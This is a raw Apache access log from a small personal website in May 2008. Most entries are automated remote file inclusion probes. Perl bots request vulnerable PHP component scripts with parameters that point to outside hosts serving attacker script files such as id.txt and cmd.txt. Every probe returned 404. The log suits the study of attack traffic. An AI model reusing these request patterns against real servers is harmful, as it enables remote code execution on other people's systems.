70.87.81.18 - - [23/May/2008:13:23:57 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
217.194.33.88 - - [23/May/2008:13:26:56 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
82.192.70.11 - - [23/May/2008:13:28:24 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
82.192.70.11 - - [23/May/2008:13:28:31 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.64"
216.188.60.54 - - [23/May/2008:13:30:33 -0500] "GET /logs//board//skin/zero_vote/error.php?dirhttp://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
216.188.60.54 - - [23/May/2008:13:30:34 -0500] "GET //board//skin/zero_vote/error.php?dirhttp://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
70.87.81.18 - - [23/May/2008:13:30:49 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
213.234.216.10 - - [23/May/2008:13:31:39 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
70.84.182.98 - - [23/May/2008:13:31:45 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
70.84.182.98 - - [23/May/2008:13:31:45 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
70.84.182.98 - - [23/May/2008:13:31:45 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
213.234.216.10 - - [23/May/2008:13:31:57 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
62.163.140.46 - - [23/May/2008:13:32:52 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
62.163.140.46 - - [23/May/2008:13:32:53 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
65.55.208.123 - - [23/May/2008:13:33:24 -0500] "GET /logs/access_log.1202428800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [23/May/2008:13:33:24 -0500] "GET /rachel%20study/ HTTP/1.1" 200 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
160.99.12.231 - - [23/May/2008:13:34:11 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:34:11 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:34:29 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:34:30 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
87.106.178.42 - - [23/May/2008:13:35:11 -0500] "GET /logs/access_log.1207180800/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:13:35:11 -0500] "GET /logs/access_log.1207180800/home.php?sit=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:35:48 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:35:49 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:35:49 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:35:58 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:35:58 -0500] "GET //skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:35:59 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.249.77.90 - - [23/May/2008:13:38:11 -0500] "GET /logs/access_log.1207785600//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
70.84.182.98 - - [23/May/2008:13:39:45 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
68.112.43.69 - - [23/May/2008:13:42:41 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
65.55.208.137 - - [23/May/2008:13:42:51 -0500] "GET /logs/access_log.1175558400 HTTP/1.1" 200 233364 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.249.77.90 - - [23/May/2008:13:43:10 -0500] "GET /logs/access_log.1207180800//s?ie=UTF8&keywords=earthdawn%2F%2Fadmin.php%3Finclude_path&index=blended&page=http://www.geocities.com/cefill/bangsat/anjing.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
206.221.179.200 - - [23/May/2008:13:43:12 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?phpbb_root_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
206.221.179.200 - - [23/May/2008:13:43:12 -0500] "GET /components/com_rsgallery/rsgallery.html.php?phpbb_root_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
74.53.197.2 - - [23/May/2008:13:44:02 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?phpbb_root_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
74.53.197.2 - - [23/May/2008:13:44:02 -0500] "GET /components/com_rsgallery/rsgallery.html.php?phpbb_root_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
207.58.164.77 - - [23/May/2008:13:46:01 -0500] "GET /logs/access_log.1207785600//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
207.58.164.77 - - [23/May/2008:13:46:01 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
207.58.164.77 - - [23/May/2008:13:46:02 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
207.58.164.77 - - [23/May/2008:13:46:04 -0500] "GET /logs/access_log.1207180800//faqsupport/samplefaqsupport.php?path[docroot]=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
216.188.60.54 - - [23/May/2008:13:47:30 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
216.188.60.54 - - [23/May/2008:13:47:30 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:47:49 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:13:47:57 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
75.102.21.26 - - [23/May/2008:13:50:44 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.811"
75.102.21.26 - - [23/May/2008:13:50:44 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.811"
64.20.40.147 - - [23/May/2008:13:51:36 -0500] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wazhost.sitebr.net/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.65"
64.20.40.147 - - [23/May/2008:13:51:44 -0500] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wazhost.sitebr.net/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
70.149.21.89 - - [23/May/2008:13:52:20 -0500] "GET /logs/access_log.1191628800 HTTP/1.1" 200 155236 "http://search.msn.com/results.aspx?q=70.149.21.89&FORM=MSNH""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
70.149.21.89 - - [23/May/2008:13:52:21 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
72.249.79.180 - - [23/May/2008:13:54:46 -0500] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
72.249.79.180 - - [23/May/2008:13:54:46 -0500] "GET /agendax/addevent.inc.php?agendax_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
217.67.26.84 - - [23/May/2008:13:55:11 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:13:55:11 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:13:55:11 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:13:55:12 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
160.99.12.231 - - [23/May/2008:13:55:22 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:55:22 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:55:23 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:55:25 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:55:26 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:55:26 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:55:26 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
160.99.12.231 - - [23/May/2008:13:55:29 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.bnsclinic.com/bbs/spray.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.65"
200.115.3.3 - - [23/May/2008:14:00:11 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
200.115.3.3 - - [23/May/2008:14:00:11 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
61.222.167.228 - - [23/May/2008:14:02:27 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
122.201.76.50 - - [23/May/2008:14:03:25 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
122.201.76.50 - - [23/May/2008:14:03:26 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
122.201.76.50 - - [23/May/2008:14:04:43 -0500] "GET /logs//admin/spaw/phpsecurityadmin/include/logout.php=http:http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 369 "-""libwww-perl/5.810"
122.201.76.50 - - [23/May/2008:14:04:43 -0500] "GET //admin/spaw/phpsecurityadmin/include/logout.php=http:http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.810"
65.55.208.130 - - [23/May/2008:14:07:12 -0500] "GET /logs/?M=A HTTP/1.1" 200 84638 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.96.80.9 - - [23/May/2008:14:07:40 -0500] "GET /logs/access_log.1207785600//newspublish/include.php?path%5Bdocroot%5D=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.801"
66.96.80.9 - - [23/May/2008:14:07:40 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.801"
66.96.80.9 - - [23/May/2008:14:07:40 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.801"
66.96.80.9 - - [23/May/2008:14:07:50 -0500] "GET /logs/access_log.1207008000//newspublish/include.php?path%5Bdocroot%5D=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.801"
74.6.18.217 - - [23/May/2008:14:11:22 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.19.171 - - [23/May/2008:14:11:23 -0500] "GET /tattoo/set1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
61.222.167.228 - - [23/May/2008:14:17:12 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
61.222.167.228 - - [23/May/2008:14:17:25 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
122.201.76.50 - - [23/May/2008:14:22:54 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
122.201.76.50 - - [23/May/2008:14:22:54 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
122.201.76.50 - - [23/May/2008:14:24:14 -0500] "GET /logs//admin/spaw/phpsecurityadmin/include/logout.php=http:http://?? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
122.201.76.50 - - [23/May/2008:14:24:15 -0500] "GET //admin/spaw/phpsecurityadmin/include/logout.php=http:http://?? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
67.15.113.15 - - [23/May/2008:14:26:20 -0500] "GET /logs/access_log.1204761600//Neos_Chronos/header.php?base_folder=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
67.15.113.15 - - [23/May/2008:14:26:21 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
67.15.113.15 - - [23/May/2008:14:26:23 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
67.15.113.15 - - [23/May/2008:14:26:23 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
213.238.52.62 - - [23/May/2008:14:36:16 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
213.238.52.62 - - [23/May/2008:14:36:17 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
88.84.143.195 - - [23/May/2008:14:36:31 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
88.84.143.195 - - [23/May/2008:14:36:32 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
65.214.44.28 - - [23/May/2008:14:37:32 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [23/May/2008:14:37:33 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [23/May/2008:14:37:33 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [23/May/2008:14:37:33 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [23/May/2008:14:37:33 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [23/May/2008:14:37:33 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [23/May/2008:14:37:33 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
72.249.79.180 - - [23/May/2008:14:48:07 -0500] "GET /logs/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
72.249.79.180 - - [23/May/2008:14:48:07 -0500] "GET /cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
189.22.150.131 - - [23/May/2008:14:48:43 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
189.22.150.131 - - [23/May/2008:14:48:44 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
209.25.195.72 - - [23/May/2008:15:04:06 -0500] "GET /logs//header.php?prefix=http://www.nigelbriganti.com/auction/test.txt?? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
209.25.195.72 - - [23/May/2008:15:04:07 -0500] "GET //header.php?prefix=http://www.nigelbriganti.com/auction/test.txt?? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
65.55.208.136 - - [23/May/2008:15:04:41 -0500] "GET /logs/access_log.1172102400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.119 - - [23/May/2008:15:05:28 -0500] "GET /logs/access_log.1163635200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.194.70.92 - - [23/May/2008:15:06:04 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://dj.caucasus.net/id11.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
82.194.70.92 - - [23/May/2008:15:06:04 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://dj.caucasus.net/id11.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.55.208.120 - - [23/May/2008:15:06:48 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.98.95.186 - - [23/May/2008:15:12:03 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
65.98.95.186 - - [23/May/2008:15:12:03 -0500] "GET //skin/zero_vote/error.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
217.67.26.84 - - [23/May/2008:15:13:11 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:15:13:11 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
87.106.28.93 - - [23/May/2008:15:13:17 -0500] "GET /samplefaqsupport.php?path[docroot]=http://multiplan.pl/modules/test.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
87.106.28.93 - - [23/May/2008:15:13:17 -0500] "GET /logs/samplefaqsupport.php?path[docroot]=http://multiplan.pl/modules/test.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
217.67.26.84 - - [23/May/2008:15:18:02 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:15:18:02 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
82.146.59.228 - - [23/May/2008:15:18:40 -0500] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 411 "-""libwww-perl/5.803"
82.146.59.228 - - [23/May/2008:15:18:40 -0500] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.phpmosConfig_absolute_path=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 406 "-""libwww-perl/5.803"
82.146.59.228 - - [23/May/2008:15:22:14 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
82.146.59.228 - - [23/May/2008:15:22:14 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.duclaux.net/wiki/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
84.243.253.159 - - [23/May/2008:15:22:20 -0500] "GET /logs/access_log.1207180800/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
84.243.253.159 - - [23/May/2008:15:22:21 -0500] "GET /home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
84.243.253.159 - - [23/May/2008:15:22:21 -0500] "GET /logs/home.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
70.84.192.18 - - [23/May/2008:15:22:22 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.walmax.eu/upload/.help/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
70.84.192.18 - - [23/May/2008:15:22:22 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.walmax.eu/upload/.help/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
74.6.17.181 - - [23/May/2008:15:23:45 -0500] "GET /artwork/coffins.htm HTTP/1.0" 200 1485 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.58.164.77 - - [23/May/2008:15:26:53 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/ask_password.php?dir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
207.58.164.77 - - [23/May/2008:15:26:53 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 316 "-""libwww-perl/5.808"
207.58.164.77 - - [23/May/2008:15:26:53 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.hssilva.net/ess//claroline/tracking/TT??? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
72.47.201.117 - - [23/May/2008:15:27:30 -0500] "GET //index.php?option=com_wrapper&Itemid=&mosConfig_absolute_path=http://www.geocities.com/koeluna/test.txt??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
